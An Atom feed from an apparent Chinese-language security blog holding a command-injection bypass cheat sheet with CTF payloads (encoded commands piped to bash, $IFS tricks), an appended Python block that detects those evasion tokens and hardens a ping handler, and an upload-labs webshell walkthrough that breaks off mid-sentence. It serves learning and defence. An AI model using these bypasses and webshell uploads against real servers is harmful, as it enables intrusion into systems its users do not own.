<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
<title>Hexo</title>
<link href="http://example.com/atom.xml" rel="self"/>
<link href="http://example.com/"/>
<updated>2022-10-18T15:07:29.703Z</updated>
<id>http://example.com/</id>
<author>
<name>zi1ch</name>
</author>
<generator uri="https://hexo.io/">Hexo</generator>
<entry>
<title>Command Injection</title>
<link href="http://example.com/2022/10/18/%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5/"/>
<id>http://example.com/2022/10/18/%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5/</id>
<published>2022-10-18T14:12:54.083Z</published>
<updated>2022-10-18T15:07:29.703Z</updated>
<content type="html"><![CDATA[<p>A summary of command injection techniques</p><span id="more"></span><p>Command injection means that malicious code is entered where the application expects data, and because the system neither filters nor otherwise processes that input, the malicious code is executed as well, ultimately leaking data or destroying legitimate data.</p><p><strong>Common operating-system commands (simple examples)</strong></p><p>ipconfig,</p><p>net user (list system users),</p><p>dir (list the current directory),</p><p>find (find lines containing a given string),</p><p>whoami (show the current effective user name)</p><h3 id="命令行执行注入"><a href="#命令行执行注入" class="headerlink" title="Command-line execution injection"></a>Command-line execution injection</h3><p>A&B (simple concatenation; A and B do not constrain each other),</p><p>A&&B (B runs only if A succeeded),</p><p>A|B (the output of A becomes the input of B),</p><p>A||B (B runs only if A failed)</p><p>In shell commands, <strong>Linux</strong> also defines <code>";"</code> as a statement terminator: several shell commands can be separated by <code>";"</code> and they run in order from left to right regardless of whether each one fails.</p><h3 id="规则验证绕过"><a href="#规则验证绕过" class="headerlink" title="Bypassing rule-based validation"></a>Bypassing rule-based validation</h3><h4 id="空格绕过"><a href="#空格绕过" class="headerlink" title="Space bypass"></a>Space bypass</h4><ul><li><p><code>${IFS}</code></p><blockquote><p>$IFS is a shell variable: when the shell performs "command substitution" and "parameter substitution" it splits the words it reads according to the value of IFS, which defaults to space, tab and newline, then processes special characters and finally reassembles the result and assigns it back to the variable.</p><p>Used bare, $IFS makes the shell think the variable name has not ended, so the following text is parsed as part of it: in <code>cat$IFSflag.php</code>, for example, <code>IFSflag</code> is parsed as a single variable name. The name therefore has to be terminated after $IFS so that the expansion ends there and the rest of the line is executed normally.</p></blockquote><p><img src="/2022/10/18/%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5/image-20221015231112097.png" alt="image-20221015231112097"></p></li><li><p><code>${IFS}$1</code></p></li><li><p><code>$IFS$1</code></p><p>$1 refers to the first positional parameter; in the screenshot below the first parameter is 1.txt</p><p><img src="/2022/10/18/%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5/image-20221015231245407.png" alt="image-20221015231245407"></p></li><li><p><code>&lt;</code> and <code>&lt;&gt;</code></p></li><li><p><code>{cat,flag}</code></p><p><img src="/2022/10/18/%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5/image-20221015232757231.png" alt="image-20221015232757231"></p></li><li><p><code>%20</code> (substituted for the space)</p></li><li><p><code>%0a</code> (line feed)</p></li><li><p><code>%0d</code> (carriage return)</p></li><li><p><code>%09</code> (tab)</p></li></ul><blockquote><p><strong>$num mainly serves to terminate the variable name</strong></p><p>$0 is the name of the shell script itself<br>$1 is the first argument passed when the script is run<br>$2 is the second argument passed when the script is run</p><p>$@ expands to all arguments<br>$# is the number of arguments</p></blockquote><h4 id="通配符绕过"><a href="#通配符绕过" class="headerlink" title="Wildcard bypass"></a>Wildcard bypass</h4><p>In Linux, <code>?</code> can stand in for a letter</p><p><code>/???/c?t flag.txt</code></p><p>In Linux, <code>*</code> performs fuzzy (glob) matching</p><p><code>cat flag.*</code> (here <code>*</code> matches, for example, php)</p><p><code>?</code> stands for one character, <code>*</code> for any run of characters</p><h4 id="黑名单-关键字)绕过"><a href="#黑名单-关键字)绕过" class="headerlink" title="Blacklist (keyword) bypass"></a><strong>Blacklist (keyword) bypass</strong></h4><ul><li><p>Single and double quotes: <code>c"at"t fl''ag</code></p></li><li><p>Backslash: <code>ca\t fl\ag</code> // defeats filters that match a fixed string</p></li><li><p>$num and $@: <code>c$1at fl$@ag</code></p><blockquote><p>For example, [GXYCTF 2019] Ping Ping Ping</p><p>used the concatenation <code>?ip=127.0.0.1;a=g;tac$IFS$1fla$a.php</code></p></blockquote></li><li><p>Variable concatenation: <code>a=c;b=at;c=fl;d=ag; $a$b $c$d</code> (no | needed)</p></li><li><ul><li><p><code>/?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php</code> or</p></li><li><p><code>/?ip=1;a=f;d=ag;c=l;cat$IFS$a$c$d.php</code></p><p><strong>The "|" pipe passes the output of the preceding command as the input of the following one</strong></p></li></ul></li><li><p>base64:</p></li><li><ul><li><p><code>echo "Y2F0IGZsYWc="|base64 -d</code></p></li><li><p><code>echo "Y2F0IGZsYWc="|base64 -d|bash</code></p></li><li><p><code>|echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh</code></p><p><img src="/2022/10/18/%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5/image-20221016002312506.png" alt="image-20221016002312506"></p></li></ul></li><li><p>hex encoding:</p></li><li><ul><li><p><code>echo "0x63617420666c61670a" | xxd -r -p | bash</code> (decodes to <code>cat /flag</code>)</p><blockquote><p>The xxd command converts a binary file to a hex dump and, with -r, back again</p></blockquote></li></ul></li><li><p>octal/hex escape encoding:</p></li><li><ul><li><p><code>$(printf "\x63\x61\x74\x20\x66\x6c\x61\x67")</code></p></li><li><p><code>{printf,"\x63\x61\x74\x20\x66\x6c\x61\x67"}|$0</code></p></li></ul></li></ul><h4 id="过滤一些读取文件的命令(如cat)"><a href="#过滤一些读取文件的命令(如cat)" class="headerlink" title="When file-reading commands (such as cat) are filtered"></a><strong>When file-reading commands (such as cat) are filtered</strong></h4><p><strong>Alternative commands</strong></p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">[root@kali flag123]# curl file:///flag123/flag</span><br><span class="line">flag{suifeng}</span><br><span class="line">[root@kali flag123]# strings flag</span><br><span class="line">flag{suifeng}</span><br><span class="line">[root@kali flag123]# uniq -c flag</span><br><span class="line">1 flag{suifeng}</span><br><span class="line">[root@kali flag123]# bash -v flag</span><br><span class="line">flag{suifeng}</span><br><span class="line">flag: line 1: flag{suifeng}: command not found</span><br><span class="line">[root@kali flag123]# rev flag   # reverse</span><br><span class="line">}gnefius{galf</span><br></pre></td></tr></table></figure><h4 id="绕过长度限制"><a href="#绕过长度限制" class="headerlink" title="Bypassing length limits"></a>Bypassing length limits</h4><p>The > and >> operators in Linux</p><p>> creates a file; each use creates a new file and overwrites any existing file of the same name</p><p>>> appends the string to the end of the file without overwriting the existing content</p><p><img src="/2022/10/18/%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5/image-20221018220440541.png" alt="image-20221018220440541"></p><h4 id="内联绕过"><a href="#内联绕过" class="headerlink" title="Inline bypass"></a><strong>Inline bypass</strong></h4><p>Most Unix shells, and programming languages such as Perl, PHP and Ruby, use a pair of grave accents (backticks) for command substitution: the output of one command is used as the input of another.</p><p>An inline bypass therefore means <strong>executing the output of the command inside the backticks as input</strong>. If the system filters the string flag, for example, we can let ls produce flag.php and feed that output in, in either of two ways:</p><ul><li><code>?ip=127.0.0.1;cat `ls`</code></li><li><code>?ip=127.0.0.1;cat $(ls)</code></li></ul><p>References</p><p><a href="https://zhuanlan.zhihu.com/p/550877208">https://zhuanlan.zhihu.com/p/550877208</a></p><p><a href="https://blog.csdn.net/qq_54727981/article/details/125936528">https://blog.csdn.net/qq_54727981/article/details/125936528</a></p><p><a href="https://zhuanlan.zhihu.com/p/391439312">https://zhuanlan.zhihu.com/p/391439312</a></p><p><a href="https://blog.csdn.net/qq_53142368/article/details/116152477">https://blog.csdn.net/qq_53142368/article/details/116152477</a></p>]]></content>
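Added defensive example for the Ping Ping Ping style endpoint discussed in this post (not code from the original post): the string-splicing handler in which ";", $IFS and $1 take effect, the argv-based replacement in which they do not, and a triage helper that flags the evasion tokens this post lists when they appear in request parameter values. The technique names, regexes and sample values are my own.

```python
import ipaddress
import re
import subprocess

# Evasion tokens catalogued in the post, one constructed regex per technique.
# "\x3c" is the less-than sign and "\x26" the ampersand, spelled as escapes so
# the block stays well-formed inside this feed file.
EVASION_PATTERNS = {
    "chaining": re.compile(r"[;|]|\x26\x26"),            # A;B, A|B, double-ampersand A B
    "ifs_separator": re.compile(r"\$\{?IFS\}?"),          # cat${IFS}flag, cat$IFS$1flag
    "positional_truncation": re.compile(r"\$[0-9@#]"),    # $1 / $@ / $# ending a name
    "brace_expansion": re.compile(r"\{[^}]*,[^}]*\}"),    # {cat,flag}
    "redirect_separator": re.compile(r"\x3c>?"),          # redirection used as the separator
    "split_quotes": re.compile(r"[a-z]['\"]{1,2}[a-z]"),  # c"at"t, fl''ag
    "split_backslash": re.compile(r"[a-z]\\[a-z]"),       # ca\t
    "command_substitution": re.compile(r"\$\(|`"),        # $(ls), `ls`
    "encoded_whitespace": re.compile(r"%0[9ad]", re.I),   # %09 %0a %0d
    "wildcard": re.compile(r"[?*]"),                      # /???/c?t, flag.*
    "decoder_pipeline": re.compile(r"base64|xxd|printf"), # echo ..|base64 -d|sh
}

# Constructed sample parameter values: the post's payloads next to a benign one.
SAMPLE_VALUES = [
    "127.0.0.1",
    "127.0.0.1;a=g;tac$IFS$1fla$a.php",
    "1;a=f;d=ag;c=l;cat$IFS$a$c$d.php",
    "127.0.0.1;cat $(ls)",
]


def flag_evasions(value):
    """Return the technique names whose tokens appear in a parameter value."""
    return [name for name, pat in EVASION_PATTERNS.items() if pat.search(value)]


def triage(values):
    """Map each parameter value to the evasion techniques found in it."""
    return {v: flag_evasions(v) for v in values}


def unsafe_shell_command(ip):
    """The vulnerable pattern: the parameter is spliced into a string that a shell
    will parse, so every separator in EVASION_PATTERNS is interpreted. Returned,
    not executed, so the result can be inspected."""
    return "ping -c 1 " + ip


def safe_ping_argv(ip):
    """Hardened form: the value must parse as an IP address (anything else raises
    ValueError) and is passed as one argv element, never through a shell."""
    addr = ipaddress.ip_address(ip.strip())
    return ["ping", "-c", "1", str(addr)]


def accepts(ip):
    """True if safe_ping_argv would run a ping for this value."""
    try:
        safe_ping_argv(ip)
        return True
    except ValueError:
        return False


def run_ping(ip):
    """Execute the hardened form; a list argv means shell=False, so no shell parsing."""
    return subprocess.run(safe_ping_argv(ip), capture_output=True, text=True, timeout=10)
```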
<summary type="html"><p>A summary of command injection techniques</p></summary>
<category term="note" scheme="http://example.com/tags/note/"/>
<category term="Command Injection" scheme="http://example.com/tags/Command-Injection/"/>
</entry>
<entry>
<title>upload-labs wp</title>
<link href="http://example.com/2022/07/18/upload-labs/"/>
<id>http://example.com/2022/07/18/upload-labs/</id>
<published>2022-07-18T15:05:58.000Z</published>
<updated>2022-07-18T16:25:22.525Z</updated>
<content type="html"><![CDATA[<p>Writeup for the upload-labs file-upload range</p><span id="more"></span><h3 id="pass-1:"><a href="#pass-1:" class="headerlink" title="pass 1:"></a>pass 1:</h3><p><img src="/2022/07/18/upload-labs/3def4310b3309a537f82d3689c8e42cd.png" alt="screenshot"></p><p>The task is to upload an image and use that upload to plant a webshell. There must be some filtering that restricts uploads to image formats; a one-line webshell is a quick first test.</p><p><img src="/2022/07/18/upload-labs/62831d7492edcffa9bc12542e1ed6a0e.png" alt="screenshot"></p><p>JavaScript normally runs on the client, i.e. on our own machine, so the file extension can be changed by intercepting and editing the request</p><p>Rename the PHP webshell so it passes the JS check, then use Burp to change the extension back in the request, so that the "jpg" webshell is executed as PHP on the server</p><p><img src="/2022/07/18/upload-labs/a4f3cc976520c48f6d62d4808e0b16e6.png" alt="screenshot"></p><p>AntSword connects successfully</p><p><img src="/2022/07/18/upload-labs/82a6649c6da5550e3ad18ea1f95de608.png" alt="screenshot"></p><p>The successful upload is also visible locally</p><p><img src="/2022/07/18/upload-labs/c1a83a67e80362143e1c36ef40e42974.png" alt="screenshot"></p><p>Because the JS runs in the front end, we can also open the developer tools (F12) and edit the code to bypass the check</p><p><img src="/2022/07/18/upload-labs/64035f31476072e9e96aadf9dc8ca57c.png" alt="screenshot"></p><p>The validation JS is visible, but simply deleting the validation code is not enough</p><p><img src="/2022/07/18/upload-labs/fa497de636adf33c8eb6bef4080d9f33.png" alt="screenshot"></p><p>A quick read shows that the form submission in the main function calls the checking function checkFile()</p><p>After removing that call the upload succeeds.</p><p>Burp can also strip the JS automatically, or JS can be disabled in the browser; with no server-side check the upload can be sent directly.</p><p>Another option is to edit the JS so the form submits; the page has to be refreshed afterwards</p><br><h3 id="pass-2:"><a href="#pass-2:" class="headerlink" title="pass 2:"></a>pass 2:</h3><p><img src="/2022/07/18/upload-labs/6fdd2486ec53f64efdb880d667210a1b.png" alt="screenshot"></p><p>Level 2 looks much like level 1. F12 shows no JS validation code, though the form submission still calls checkFile</p><p>Uploading a .php file gives an error</p><p><img src="/2022/07/18/upload-labs/a203526c3c264e5b56cde0b4f4b9fdcf.png" alt="screenshot"></p><p>Intercepting and editing the request still works</p><p><img src="/2022/07/18/upload-labs/a3f592ee7049bdb3ac5feaf446166130.png" alt="screenshot"></p><p><img src="/2022/07/18/upload-labs/5bb28713ae9a6b5da32e3bc42e2c7df7.png" alt="screenshot"></p><p>The source shows a check on the file format. $_FILES['myFile']['type'] is the MIME type of the file, which relies on the browser supplying it, for example "image/gif".</p><p>It corresponds to the Content-Type in the request, so bypassing the MIME-type check is enough</p><p><img src="/2022/07/18/upload-labs/120e3c0d889929a92f93400e69bca470.png" alt="screenshot"></p><img src="/2022/07/18/upload-labs/39ba67d36598637197466af0f5c8d8d1.png" alt="screenshot" style="zoom:100%;"><p>Change it to image/jpeg (any image type will do)</p><br><h3 id="pass-3:"><a href="#pass-3:" class="headerlink" title="pass 3:"></a>pass 3:</h3><p><img src="/2022/07/18/upload-labs/504a94b3bf361b313c4c1006297c4f61.png" alt="screenshot"></p><p>The earlier methods do not work well here, so look at the source</p><p><img src="/2022/07/18/upload-labs/18d2be3911d29f365fd429aca5e746f8.png" alt="screenshot"></p><p>A blacklist is defined and the file name is filtered to some extent: case is checked and dots and spaces are removed, but the blacklist is incomplete and does not cover every PHP extension</p><p>The blacklist filtering also suggests some bypasses, such as hacktest.php. ; hacktest.PHP ; hacktest.php::$DATA ; hacktest.php (with a trailing space)</p><p>PHP files, for example, have the extensions .php .phtml .phps .php5 .pht</p><p><img src="/2022/07/18/upload-labs/8058cbbd5ef1a1f41eaba006663c7e6c.png" alt="screenshot"></p><p>Uploaded directly</p><p><img src="/2022/07/18/upload-labs/ac6c591d0fa1c979b2b67ad1dd1de30f.png" alt="screenshot"></p><p>In the default phpstudy environment php3, phtml and similar files are not parsed; httpd.conf has to be configured. It still did not work for some reason, so I skipped it for now</p><p>After rebuilding the range with phpstudy2018 and reconfiguring, the shell connects</p><p><img src="/2022/07/18/upload-labs/caba9b9f0960fd8729a3f11193ec0059.png" alt="screenshot"></p><br><h3 id="pass-4:"><a href="#pass-4:" class="headerlink" title="pass 4:"></a>pass 4:</h3><p><img src="/2022/07/18/upload-labs/b00e70f995ceeda090463de2e9861711.png" alt="screenshot"></p><p>This level is an upgraded version of level 3: the response no longer says which files are filtered, and most are, but .htaccess is not</p><p>.htaccess (the "distributed configuration file", in full Hypertext Access) provides a way to change configuration per directory: a file containing one or more directives is placed in a particular document directory and applies to that directory and all its subdirectories. The directives available to a user are restricted; the administrator controls them with Apache's AllowOverride directive.</p><p>In short, it is an Apache configuration file. Once the two conditions "1. AllowOverride All; 2. LoadModule rewrite_module modules/mod_rewrite.so (the rewrite module is enabled)" are met, a .htaccess file can be uploaded to change the configuration</p><p>The file must be named exactly .htaccess, not something like 1.htaccess, or it will not be parsed; if it is renamed it will not be parsed either</p><p>Here we can configure jpg files to be parsed as PHP</p><p> </p><p>First edit httpd.conf</p><p><img src="/2022/07/18/upload-labs/5d9c7ad4b7f4ca212d9f5d6b5287ae17.png" alt="screenshot"></p><p>The .htaccess content is AddType application/x-httpd-php .jpg, meaning every jpg file is executed as PHP; without the .jpg, AddType application/x-httpd-php executes every file as PHP</p><p>After a successful upload it still could not be used</p><p><img src="/2022/07/18/upload-labs/fa38adee9a423b8e5d230dbaa4de18f6.png" alt="screenshot"></p><p>It turned out that the PHP version in the phpstudy panel was NTS, i.e. non-thread-safe, which provides no data-access protection and does not support .htaccess</p><p> </p><p>After downloading and rebuilding the range again it connects</p><p><img src="/2022/07/18/upload-labs/d04a8412671eed1ebcb6f4b8c07bc3e1.png" alt="screenshot"></p><p><img src="/2022/07/18/upload-labs/6173f9497b78197f879ae9ee61946e26.png" alt="screenshot"></p><h3 id="pass-5:"><a href="#pass-5:" class="headerlink" title="pass 5:"></a>pass 5:</h3><p>A quick test shows that .htaccess is banned too</p><p>The source shows one check fewer than before: the case conversion is missing, so let's try to bypass that</p><p><img src="/2022/07/18/upload-labs/4bfa44bbe2b5e539f51c7fe161e8601b.png" alt="screenshot"></p><p>These checks are all based on how Windows creates files: it ignores case and drops trailing dots</p><p>Upload and connection both work</p><p><img src="/2022/07/18/upload-labs/49fccb75e48b370d97ac933bf1f1ccec.png" alt="screenshot"></p><h3 id="pass-6:"><a href="#pass-6:" class="headerlink" title="pass 6:"></a>pass 6:</h3><p>Following the hints from pass 3, do black-box testing without reading the source. Some of the bypasses have to be done in Burp Suite, such as appending a dot or a space to the extension, because Windows strips those automatically when creating a file, so changing the name locally does not work</p><p><img src="/2022/07/18/upload-labs/325429cf04ee4a721ad96f78e10ba84f.png" alt="screenshot"></p><p>Adding a space bypasses the check</p><br><h3 id="pass-7:"><a href="#pass-7:" class="headerlink" title="pass 7:"></a>pass 7:</h3><p>Back to uploading images</p><p>Let's try crafting an image webshell and uploading it</p><p><img src="/2022/07/18/upload-labs/3c935c3c25d3623a5b42aa6652caed0c.png" alt="screenshot"></p><p>It uploads but cannot be connected to</p><p>After more testing it turned out I was overthinking it; this is still an extension bypass</p><p>This time the dot is not checked</p><p>Editing in Burp goes straight through</p><p><img src="/2022/07/18/upload-labs/f2362c7e18f2044d22ff24f72dc2b03b.png" alt="screenshot"></p><br><h3 id="pass-8:"><a href="#pass-8:" class="headerlink" title="pass 8:"></a>pass 8:</h3><p>Try an extension bypass again</p><p>On Windows, appending "::$DATA" to a file name makes the data after ::$DATA be treated as a file stream, so the extension is not checked and the file name before ::$DATA is kept. Its purpose is to skip the extension check</p><p>Based on the earlier test points I tried whether the stream marker was unchecked, and it passed first time</p><h3 id="pass-9:"><a href="#pass-9:" class="headerlink" title="pass 9:"></a>pass 9:</h3><p><img src="/2022/07/18/upload-labs/ab67a58bc763dd1dabbbd00237b683cb.png" alt="screenshot"></p><p>Look at the source</p><p><img src="/2022/07/18/upload-labs/d39d40d3be3068a080d6970a767cf6ff.png" alt="screenshot"></p><p>Everything is filtered, but since the validation runs only once we can construct a simple bypass based on the order of the checks</p><p>It first removes trailing dots, converts case, replaces the stream marker ::$DATA with the empty string, and finally trims both ends</p><p>So a name ending in ". ." gets straight through</p><p><img src="/2022/07/18/upload-labs/331eb8f69a5d8add6274195c4caa7933.png" alt="screenshot"></p><p><img src="/2022/07/18/upload-labs/3f722c6d3ba2079deef3cb7c94636f1c.png" alt="screenshot"></p><h3 id="pass-10:"><a href="#pass-10:" class="headerlink" title="pass 10:"></a>pass 10:</h3><p>Set the uploaded file name to end in .php. .; the upload succeeds but AntSword cannot connect</p><p>Checking shows that the file extension was deleted</p><p><img src="/2022/07/18/upload-labs/a3284e4ea54f8d38fd2aed84d646b1f5.png" alt="screenshot"></p><p>Look at the source</p><p><img src="/2022/07/18/upload-labs/756142933017cec497ecaec8824e5408.png" alt="screenshot"></p><p>The filtering is mainly in the two middle lines: every blacklisted extension in the name is replaced with the empty string, and trim removes spaces and the like from both ends of the file name</p><p><img src="/2022/07/18/upload-labs/f43a4a6493afeec7c64947cac3fd2fe5.png" alt="screenshot"></p><p>We can exploit that deletion and construct .pphphp: since the replacement runs once rather than in a loop, deleting one php from left to right leaves php behind</p><p>Writing phtmlhp makes it easier to see</p><p><img src="/2022/07/18/upload-labs/59d1df1f50d26f9c428c11b6440161e8.png" alt="screenshot"></p><p>Connected</p><p><img src="/2022/07/18/upload-labs/3c3987d5e59cda393afb5ba525310d61.png" alt="screenshot"></p><br><h3 id="pass-11:"><a href="#pass-11:" class="headerlink" title="pass 11:"></a>pass 11:</h3><p>Uploading an image shows that the file name changes to a time-based name</p><p><img src="/2022/07/18/upload-labs/1afa10113fac9c386684f1cc63a1d1c6.png" alt="screenshot"></p><p><img src="/2022/07/18/upload-labs/05a968a5c04dc1e3b28803412daa2b93.png" alt="screenshot"></p><p><del>This means we cannot connect using the original file name</del></p><p>The hint says the path is controllable, so read the source carefully</p><p><img src="/2022/07/18/upload-labs/34e14cf707d7f60149224c9c4e736154.png" alt="screenshot"></p><p>It is read with GET, which takes its parameters from the part of the URL after ?</p><p>We can use URL-encoded %00 truncation to control the upload path so that the file is not renamed</p><p><img src="/2022/07/18/upload-labs/66c9f62fa7a03f00c87d1eeb6954b016.png" alt="screenshot"></p><p>Two things have to be changed: the file extension, to pass the check, and the URL path, which is encoded and then truncated so the file is written there</p><p>One problem: the PHP version must be below 5.3 for %00 to truncate strings in a GET request, and magic_quotes_gpc in php.ini must be OFF</p><p>My PHP version was 5.4.45, so I changed it and edited the configuration file</p><p><img src="/2022/07/18/upload-labs/7d12079d2424a1694fde656d75c829bb.png" alt="screenshot"></p><p><img src="/2022/07/18/upload-labs/2e7707ce1db0c5119e5af3a1cc76327f.png" alt="screenshot"></p><p>Success</p><p><img src="/2022/07/18/upload-labs/ee75e5411cc1792f55a7e4100127e267.png" alt="screenshot"></p><p><img src="/2022/07/18/upload-labs/b0e059558c9c0a56c539878180a4dbf4.png" alt="screenshot"></p><br><h3 id="pass-12:"><a href="#pass-12:" class="headerlink" title="pass 12:"></a>pass 12:</h3><p>Without reading the hint or the source, look at the request first</p><p><img src="/2022/07/18/upload-labs/2e5b2562474829a9283712452b2aa3e9.png" alt="screenshot"></p><p>It is now sent via POST; the other mechanics should be like the previous level</p><p>Truncate save_path with %00 as before. The problem is that %00 cannot simply be written into the body the way it was in the URL, where URL decoding performed the truncation, so consider editing the hex value</p><p>Or just URL-decode it in Burp and send</p><p><img src="/2022/07/18/upload-labs/6df82deb9f9bb38ccc8c858c321601ac.png" alt="screenshot"></p><p>Alternatively edit the hex value: use a + (which represents a space) to mark the position, then change it</p><p><img src="/2022/07/18/upload-labs/e4a4be5a5604c84e037c87dfba516c78.png" alt="screenshot"></p><p>URL encodings of some common special characters</p><p><img src="/2022/07/18/upload-labs/67a1e1a1ec604581dca2edc1551fa3a7.png" alt="screenshot"></p><p>Connected</p><p><img src="/2022/07/18/upload-labs/f96e5ea30c96680eba403c400f33b8bc.png" alt="screenshot"></p><br><h3 id="pass-13:"><a href="#pass-13:" class="headerlink" title="pass 13:"></a>pass 13:</h3><p>At first I thought this was simple and assumed that an image webshell could be uploaded and connected with AntSword as before</p><p>To use an image webshell the server needs a file inclusion vulnerability, so that the image is parsed and the malicious code runs</p><p>The steps are: upload the image webshell, find its absolute path, then use the file inclusion vulnerability to have the image executed as PHP, running the malicious code to get a shell</p><p>Since the level itself does not provide a file-inclusion script, I found one and put it in the upload directory</p><p><img src="/2022/07/18/upload-labs/1927bf4a13fc7ee7e8e90084ce121858.png" alt="screenshot"></p><p>It provides file inclusion and shows the absolute path</p><p>After the upload succeeds, F12 shows the uploaded file name</p><p><img src="/2022/07/18/upload-labs/0805528305bb2bfd1b16efd32d229ceb.png" alt="screenshot"></p><p>Use the file inclusion vulnerability to get a shell</p><p><img src="/2022/07/18/upload-labs/f662bb272c241d31328c67ae0bc04e48.png" alt="screenshot"></p><p><img src="/2022/07/18/upload-labs/761ca8e344f2f2b82e63b78457122134.png" alt="c1811595c2a04d91a24bd353bfc08a8f.png"></p><p><img src="/2022/07/18/upload-labs/9945157fe3843e25af23816a02a158aa.png" alt="screenshot"></p><p>It kept erroring; the fix was to switch to a supported PHP version, 5.3 or later</p><p><img src="/2022/07/18/upload-labs/8cf77261ed54a2b4270f595725dbc219.png" alt="screenshot"></p><p><img src="/2022/07/18/upload-labs/d7b23e322d5018a2f164837df349576d.png" alt="screenshot"></p><br><p>Oddly, the range itself recommends 5.2.17, yet this level does not work with that version. This problem tormented me for ages; I thought my image webshell was wrong</p><p><img src="/2022/07/18/upload-labs/6ff0934ce708dd9c2c818a333bd4499d.png" alt="screenshot"></p><br><h3 id="pass-14:"><a href="#pass-14:" class="headerlink" title="pass 14:"></a>pass 14:</h3><p><img src="/2022/07/18/upload-labs/ea274c1ef35cbf844db10d0342b53994.png" alt="screenshot"></p><p>getimagesize()<br>This function reads the target file's bytes in hex and checks whether the first few match an image signature</p><p>The image webshell is built like the previous level, with the PHP code at the end. The previous level read only the first two bytes and this one reads a few more, so there is not much difference and the upload should succeed</p><p>For some reason even a normal image could not be uploaded, so I skipped it</p><br><h3 id="pass-15:"><a href="#pass-15:" class="headerlink" title="pass 15:"></a>pass 15:</h3><p>Upload the same image webshell as before</p><p><img src="/2022/07/18/upload-labs/4b5473e7e08d6676d145039ea735248c.png" alt="screenshot"></p><p>Passes again</p><p><img src="/2022/07/18/upload-labs/df711024141652ecba48fce80aff3d60.png" alt="screenshot"></p><p>Afterwards, look at what is new in this level</p><p><img src="/2022/07/18/upload-labs/3c887073a6817854dcbb8bb47c7c5b11.png" alt="screenshot"></p><p>exif_imagetype()?</p><p>The PHP exif module has to be configured</p><p><img src="/2022/07/18/upload-labs/880810d1da4f2f47f59eb3cff05df0af.png" alt="screenshot"></p><br><h3 id="pass-16:"><a href="#pass-16:" class="headerlink" title="pass 16:"></a>pass 16:</h3><p><img src="/2022/07/18/upload-labs/d858d9caacc32ef6bd70886a9d3418aa.png" alt="screenshot"></p><p>Upload succeeds but there is no connection</p><p><img src="/2022/07/18/upload-labs/853dd2bae62af61c1c69d2f573b9d917.png" alt="screenshot"></p><p>The image was re-rendered. Was the PHP code at the end of the image webshell removed?</p><p>Notepad confirms it is gone, yet the image still displays the same content, so I guessed that only a small part, or just the tail, was changed. The idea is to find a part that is not re-rendered and write the PHP code there</p><p><img src="/2022/07/18/upload-labs/3e5233a9b8b4e513c719e64dd6059fa6.png" alt="screenshot"></p><p>Comparison shows that most of the file changed, but a small part (the white area) did not and could hold PHP</p><p><img src="/2022/07/18/upload-labs/30b192ba194e8d8369d189f317eb8317.png" alt="screenshot"></p><p>Edit</p><p><img src="/2022/07/18/upload-labs/ab54d6268b5e240aaa18760eb112c112.png" alt="screenshot"></p><p><img src="/2022/07/18/upload-labs/92456f7aba9d81b0fa02931720c3ca9e.png" alt="screenshot"></p><p>Still no luck. I later realised I had been naive: the identical region is not necessarily untouched; it may simply have been overwritten with identical data.</p><p>The second-rendering bypass differs for each of the three formats, so let's understand second-rendering vulnerabilities</p><p>After we upload a file the site processes the image again (format, size requirements and so on): the server replaces and updates its contents, and when done it generates a new image from our original and shows it in the corresponding tag on the site.</p><p>The source that performs the second rendering is</p><p><img src="/2022/07/18/upload-labs/34c1d857362801c195941056ab94a89b.png" alt="screenshot"></p><p>The code that generates new gif, png and jpg images is similar, but the bypass differs by format</p><p>gif is the easiest and matches my initial idea of diffing the files: the gif is almost unchanged, only some of the tail is wiped</p><p><img src="/2022/07/18/upload-labs/0f26afc2b3352c0434a149cb3208371a.png" alt="screenshot"></p><p>I tried editing the unchanged part; whether replacing or inserting, the PHP code was always altered</p><p><img src="/2022/07/18/upload-labs/f06aa3b905b90ef6ae6e6493dd032cd7.png" alt="screenshot"></p><p>After many attempts, this time the downloaded file viewed in WinHex still had the PHP code intact</p><p><img src="/2022/07/18/upload-labs/1dce88c29dbafce8a584b3baef28dc24.png" alt="screenshot"></p><p>Success!</p><p><img src="/2022/07/18/upload-labs/a3e773e87a59157ec11a903751ff1882.png" alt="screenshot"></p><p>png is much more troublesome</p><p>A png image consists of <strong>three or more chunks</strong>.</p><p>PNG defines <strong>two kinds of chunk</strong>: critical chunks, which are standard, and ancillary chunks, which are optional.</p><p><strong>The critical chunks define three standard chunks (IHDR, IDAT, IEND)</strong> that every PNG file must contain.</p><p><img src="/2022/07/18/upload-labs/4ddec4f3ef58d4140f9dd6fd30867617.png" alt="screenshot"></p><p>Code is mainly written into the PLTE and IDAT chunks:</p><p>Writing into PLTE mainly requires a script to compute the CRC after the PHP code is inserted, and replacing it by hand</p><p>It needs an indexed-colour image; the few I tried were not, to be revisited later</p><p><img src="/2022/07/18/upload-labs/0163b9c4858fbc44b10d2228917413aa.png" alt="screenshot"></p><p>I do not understand the IDAT structure well; there are ready-made scripts</p><p><img src="/2022/07/18/upload-labs/1f4e441efc31dc9ac8315383f89cd65a.png" alt="screenshot"></p><p>The script generates a file named aba.png</p><p>After generation, a perfectly good image becomes a black one<img src="/2022/07/18/upload-labs/aca12eed10440cdc7f150f9442e5e880.png" alt="screenshot"></p><br><p><img src="/2022/07/18/upload-labs/f0f9112c51763cf9581b288d01e60ccc.png" alt="screenshot"></p><p>The download is unchanged, so the bypass works, but I am not sure exactly how to use it; presumably pass @eval in the GET parameter and the password in POST to get a shell?</p><p><img src="/2022/07/18/upload-labs/4bab024546f2e9261fcc74b18ab1d37d.png" alt="screenshot"></p><p>jpg is also handled with a script</p><p>Because jpg images are fragile, the choice of image matters a great deal and generation fails easily; several images have to be tried.</p><p>phpinfo can be written in; for some reason writing a one-line 